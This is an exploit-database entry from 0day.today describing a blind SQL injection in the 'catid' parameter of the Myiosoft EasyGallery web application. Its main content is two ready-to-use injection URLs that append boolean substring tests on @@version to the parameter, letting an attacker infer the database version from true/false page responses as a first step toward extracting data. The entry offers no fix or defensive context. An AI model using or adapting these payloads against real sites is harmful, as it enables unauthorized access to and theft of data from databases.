Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability

2009-12-31T00:00:00
ID 1337DAY-ID-10539
Type zdt
Reporter Hussin X
Modified 2009-12-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability
==============================================================

___________________________________
 
 
script  : http://myiosoft.com/?1.105.0.0
 
Exploit :
_______
true & false
 
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false
 
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true



#  0day.today [2018-02-19]  #